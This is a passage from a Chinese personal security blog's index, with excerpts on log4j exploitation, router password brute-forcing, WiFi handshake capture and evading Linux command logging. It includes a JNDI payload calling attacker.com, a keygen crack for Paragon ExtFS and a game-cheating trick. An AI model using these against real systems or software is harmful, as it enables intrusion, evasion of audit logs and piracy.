文章 20
评论 1
浏览 68712
短链接(url)服务滥用

短链接(url)服务滥用

之前买了个短域名(u2l.io),来用搭建短链接生成服务,不过最后我没有给它设置访问控制和密码,之后看到了我的短链接服务被滥用了,多了很多奇怪的链接,应该是一些诈骗或者钓鱼的网站。分析了一波利用方式,感觉很迷惑。 数据库中的url映射记录每天会自动生成csv,在这里https://u2l.io/dump/,这里有一份,2022.08.19yourls.csv 短链接映射的目标url中,出现很多这样的:一段html代码以参数的形式传给一个phpinfo页面,phpinfo也买你所在的服务器也不知道是些什么网站,php版本很低,多为4.4左右。 这些个很奇怪的url访问之后浏览器会执行刷新/跳转,应该是因为这些phpinfo页面中存在一些字符没有被转义,比如尖括号<>。但是滥用者这么做的意义很让人费解,我觉得是为了躲避钓鱼/诈骗信息发布所在平台的系统自动内容检测,可能社交网站在检测链接内容的时候不会去渲染页面的html内容(未被转义的内容是一个自动刷新跳转的a标签)?再配合上短url服务,将这个特别长特别奇怪的url给缩短,这样就方便在社交网站上发布传播。 还有很多其他奇....

ubuntu下编译使用shadowsock-libev(服务端)

ubuntu下编译使用shadowsock-libev(服务端)

安装所需要的软件和依赖 sudo apt-get install --no-install-recommends gettext build-essential autoconf libtool libpcre3-dev asciidoc xmlto libev-dev libc-ares-dev automake libmbedtls-dev libsodium-dev 下载编译并安装libsodium库 export LIBSODIUM_VER=1.0.17 wget https://download.libsodium.org/libsodium/releases/libsodium-$LIBSODIUM_VER.tar.gz tar xvf libsodium-$LIBSODIUM_VER.tar.gz pushd libsodium-$LIBSODIUM_VER ./configure --prefix=/usr && make sudo make install popd sudo ldconfig 下载编译并安装MbedTLS库 export MBED....

一次失败的锐捷睿易路由器密码爆破_eg205g_burpsuite

一次失败的锐捷睿易路由器密码爆破_eg205g_burpsuite

1.找接口和参数 POST /cgi-bin/luci/api/auth HTTP/1.1 Host: 192.168.110.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-type: application/json Content-Length: 153 Origin: http://192.168.110.1 Connection: close Referer: http://192.168.110.1/cgi-bin/luci/?stamp=1657873765 Cookie: __APP_LANG__=zh_cn {"method":"login","params":{"passwo....

三星galaxy watch 4 classic连接国外手机提示

三星galaxy watch 4 classic连接国外手机提示"此手机不支持该手表"解决?

手机是pixel4xl,很多国外手机一样,有原生系统原生gms,连接国行watch4的时候提示“此手机不支持该手表”。 先在手机设置里面把google play服务给停用/停止掉,然后在三星智能穿戴app里面连接手表即可,连接上之后一定要及时重新把google play服务给启用了,不然影响后续流程。

Cisco CSR1000v通用调试分析方法

Cisco CSR1000v通用调试分析方法

STEP0 默认安装CSR1KV 使用官方的提供的OVA或者ISO镜像安装,虚拟机使用vmware STEP1修改分区中的文件 csr1000v安装完成后,应该会有多个分区,其中两个分区是不加密的,加密分区用来存储配置、数据库、许可证等信息。 分区加密挂载点作用 /dev/sda1No/bootflashbootflash /dev/sda2Lucks/nvram作为nvram使用 /dev/sda5No/variedgrub目录,rpboot、mono等pkg文件 /dev/sda6Lucks/csl_p_0许可证、序列号、udi等信息 /dev/sda7Lucks/csl_p_1许可证、序列号、udi等信息 /dev/sda8Lucks/csl_s_0许可证、序列号、udi等信息 /dev/sda9Lucks/csl_s_1许可证、序列号、udi等信息 我们需要修改其中两个不加密的分区的内容,这需要底层权限,但是现在默认安装号的CSR1000V并不直接提供底层shell访问,我们可以采用挂载启动一个live系统,在live系统中修改分区中的文件。 挂一个ubuntu l....

试试CVE-2021-44228 log4j2 rce

试试CVE-2021-44228 log4j2 rce

log4j是java程序中常用的日志工具库 20个小时前poc爆在了https://github.com/tangxiaofeng7/apache-log4j-poc 网上有很多现成的资料,今天试试poc 资料:https://www.lunasec.io/docs/blog/log4j-zero-day/ ①触发利用过程 用户发送数据到服务器,不管什么协议,http也好,别的也好 服务器记录用户请求中的数据,数据中包含恶意payload:${jndi:ldap://attacker.com/a},其中attacker.com是攻击者的服务器 log4j向attacker.com发送请求(jndi)时触发漏洞,因为有个$符号 log4j收到的jndi响应中包含一个java class文件路径,比如是 http://second-stage.attacker.com/Exploit.class,这个class文件会被log4j所运行在的服务器加载运行 第4步中注入的java class文件中的代码是攻击者的攻击代码 为了方便实验,直接用marshalsec工具。 ②安装marsha....

自己编译出的android内核因为开启了CFI导致内核panic

自己编译出的android内核因为开启了CFI导致内核panic

最近编译红米K30ultra的android内核源码,想要添加一些wifi网卡的支持(通过usb连接wifi网卡),需要有cfg80211的支持,结果一直kernel panic。 cat /proc/last_kmsg 通过查看内核日志之后,发现是wext相关的函数出发了CFI(Control Flow Integrity)机制导致的。 一顿搜索后,想了想,android上的内核还是开启clang-cfi比较好。 参考文章: https://outflux.net/slides/2020/lca/cfi.pdf 已经有的patch: https://www.spinics.net/lists/linux-wireless/msg205583.html 为什么下载到的内核源码不是打过补丁的? 问题在cfg80211功能相关的代码中,wext相关的一些函数对参数的类型限制不严格,结果就是启用CFI之后,会出现kernel panic。 一般android也没人去开启cfg80211支持啊,这部分代码之前是不参与编译的,android本身是通过nl80211来控制网卡的。

在手机上抓wifi握手包-红米k30ultra

在手机上抓wifi握手包-红米k30ultra

基本原理 android手机本身是linux内核,可以驱动起来usb网卡,只要网卡/驱动支持monitor模式,自然可以抓包。如果是kali nethunter支持的设备,可以直接刷kali nethunter。 不过我手上的k30 ultra没有官方nethunter支持,那就换系统/内核来加驱动。 1、需要的设备 支持抓包的usb无线网卡和otg线。 解锁过bootloader的红米k30 ultra(代号cezanne),要刷系统的。 2、换系统 换recovery,建议找个twrp系列的recovery刷上去。 rom下载链接: 20211004-userdebug-lineage-18.1-with-pixelexperience 通过重新编译内核源码,增加了usb网卡所需要的网卡驱动。现在至少支持realtek 81系列、ralink rt2800/3700等。 3、刷magisk,获取root 过程省略。 4、使用Hijacker 一定要在手机开启自带wifi的情况下开机,然后再插入usb网卡,避免usb网卡被分配为wlan0编号,从而被android用来当主网卡。....

linux上八种记录命令的方法以及应对--搬运自zeronights

linux上八种记录命令的方法以及应对--搬运自zeronights

原ppt:https://zeronights.ru/wp-content/uploads/2021/09/09_agarkov.pdf 主要考虑记录三样内容:命令行本身,shell中的输入stdin,shell中的stdout。 0x0 bash_history 敲命令的时候把命令记录到bash_history文件,退出的时候保存到文件,可以用history命令看见之前敲过什么。 如何避免被记录: 用kill -9 $$ 退出,而不是exit或者ctrl+D 每条命令前加个空格 将命令记录直接输出到null,而不是history文件,ln -sf /dev/null ~/.*_history 使用mc/screen等别的shell 0x1 bash debug traps 每次输入的东西都会被trap functions处理,如果想记录: #!/bin/sh debug_poc() { echo "$USER($UID:$GROUPS) ran $BASH_COMMAND" >> /tmp/commands.log } trap debug_poc DEBUG 这个....

河南联通宽带测速品台是多少?

河南联通宽带测速品台是多少?

河南联通的测速平台是商都网。 http://222.141.220.202/test_down.jsp http://cesu.shangdu.com/test_down.jsp

ubutnu20编译软件tracker-store-fs占用cpu、ram过高影响效率?

ubutnu20编译软件tracker-store-fs占用cpu、ram过高影响效率?

Solution 在编译软件的目录里面新建一个隐藏文件:.trackerignore,就像.gitignore一样。 touch .trackerignore 重启tracker服务: tracker reset -r voila

自建Symproxy服务器加速pdb文件的下载 windows程序调试

自建Symproxy服务器加速pdb文件的下载 windows程序调试

使用windbg调试时需要从符号文件服务器下载系统中一些模块的符号表文件--pdb文件,一般都是从微软的服务器上下载,不过毕竟服务器在国外,挺慢的。所以可以根据自建一个symproxy服务器做代理。 方案一 pySymproxy 可以在github上找到,https://github.com/inbilla/pySymProxy, 所需环境:windows系统,python2.7,以及dbghelp.dll(dbghelp.dll 、symsrv.dll(symsrv.dll . 两个文件。 pySymproxy使用简述 安装python2.7环境,下载pySymproxy,下载dbghelp.dll和symsrv.dll两个文件,使用pip安装依赖库 python -m pip install -r requirements.txt 修改pySymproxy的配置文件如下: ``` { "identity": { "name": "PySymProxy - Default configuration", "host": "localhost", "administrator....

使用Paragon ExtFS软件 在windows下读写访问ext3/4文件系统

使用Paragon ExtFS软件 在windows下读写访问ext3/4文件系统

Paragon ExtFS软件 Paragon ExtFS安装包: 官方下载地址 下载地址2 破解补丁: paragon.extfs.fixed.winall.read.nfo.keygentsrh.zip 破解安装 把破解补丁压缩包中的三个文件放到ExtFS的安装目录下 比如:C:\Program Files (x86)\Paragon Software\ExtFS for Windows\ 打开keygen,先点击Patch RSA 2048,选择安装目录下的Paragon ExtFS for Windows.exe 再次点击 Patch RSA 2048,选择安装目录下的extservice.exe 点击Generate让生成License,keygen会重启ExtFS的服务,之后打开 ExtFS 就发现已经破解完成。 之后ext格式的分区也能显示在资源管理器中,默认可读可写,可以在ExtFS软件中修改。

nfr52832+wireshark+sniffer抓ble包

nfr52832+wireshark+sniffer抓ble包

需要的软硬件 1. 一个抓包用的dongle:rf-dg-32b, 2. wireshark 3. sniffer sniffer软件包nordic官网下载连接 本站下载链接nrfsnifferforbluetoothle3.1.07cc811f.zip 4. python3 以及pyserial 步骤 1. 安装python3和pyserial pip3 install pyserial 2. 复制sniffer压缩包中的extcap文件中的文件到wireshark的extcap目录下 wireshark->帮助->关于wiresahrk->personal extcap path 3. 复制sniffer压缩包中的Profile_nRF_Sniffer_Bluetooth_LE目录到configuration profiles目录下 wireshark->编辑->configuration profiles 4. 把dongle插上后,去设备管理器里面通过windows update服务器联网自动安装对应的驱动 (管理员)启动wireshark

限制电脑最大音量--quite on set

限制电脑最大音量--quite on set

有的键盘可能有调音量的功能,误碰的时候可能会震聋耳朵。 解决办法:https://github.com/troylar/quiet-on-the-set setup3.exe

windows server作为dns缓存服务器开dnssec

windows server作为dns缓存服务器开dnssec

关于dnssec        dnssec技术细节这里不谈,网上有,这里只提一下它的作用和局限性。        dnssec核心不在于防止解析结果被篡改,不在于安全传输,而是在于校验通过递归查询得到的结果是否正确,是否正确的判断标准是:解析结果是否是所查询域名的权威服务器所想要提供的,比如:video.erlkonig.tech的权威服务器是any.ns.cloudflare.com,权威服务器想要提供的A解析结果是104.18.44.85,那么经过查询得到的结果一样则是正确的。        以video.erlkonig.tech这个域名为例,原理是:通过签名,权威服务器any.ns.cloudflare.com使用zks-private对解析结果(resource record)进行签名并将签名值添加为RRSIG类型的记录。客户端到通过zsk-public和RRSIG来....

Telegram的GameBot的MathBattle刷分

Telegram的GameBot的MathBattle刷分

1. 找到群组内的游戏链接通过chrome浏览器打开 电脑上可以像上面那样,手机上可以选择用浏览器打开然后找到链接。 2. 打开chrome的调试工具 由于脚本限制,没法儿通过快捷键F12或者ctrl+shift+i打开调试工具,需要手动的点一下。 3. 设置chrome的override保存目录 在source->overrides选项卡里面设置一下,选择一个本地目录用来存储要修改的源码文件。 选择好目录后记得点一下运行访问本地目录: 4. 将要修改的源码文件保存到overrides 之后刷新页面的话,浏览器会使用保存到本地的overrides里面的源码文件,而不是服务器发来的文件。 5. 修改源码 问题都是随机生成的,ctrl+f直接找random,顺藤摸一个瓜。 在生成完问题之后,将答案(正确与否)输出出来 6. 看着答案答题

IDA图标是谁?

IDA图标是谁?

曼特农夫人 https://zh.wikipedia.org/wiki/%E6%9B%BC%E7%89%B9%E8%BE%B2%E5%A4%AB%E4%BA%BA

openwrt固件远程抓包分析?

openwrt固件远程抓包分析?

有些时候我们需要用 wireshark 来分析 openwrt 路由器上的一些流量,端口镜像是一种方法,不过有时候还是需要用 tcpdump 和 SSH 结合一下,然后在本地用 wireshark 分析流量。 在本地运行这条命令: ssh -p 22 root@192.168.6.1 root@192.168.6.1 'tcpdump -s 0 -U -n -i br-lan -w - not port 22'|wireshark -k -i - 这条命令将在连接上路由器的 SSH 后,执行 tcpdump -s 0 -U -n -i br-lan -w - not port 22 这条命令,即运行路由器上的 tcpdump,并且告诉 tcpdump:-s 保存完整的数据报,-i br-lan 指定接口,-w -将抓取到的东西写到标准输出中。然后通过管道符号 | ,将 tcpdump 的输出交给 wireshark 从而分析。 当然也可以先建立一个命令管道: mkfifo /tmp/pcappipe 然后在执行: SSH -p 22 root@192.168.6.1 root@1....

被人突然按了关机键?

被人突然按了关机键?

在控制面板中找到电源选项: 然后更改计划设置->更改高级电源设置

记录精彩的程序人生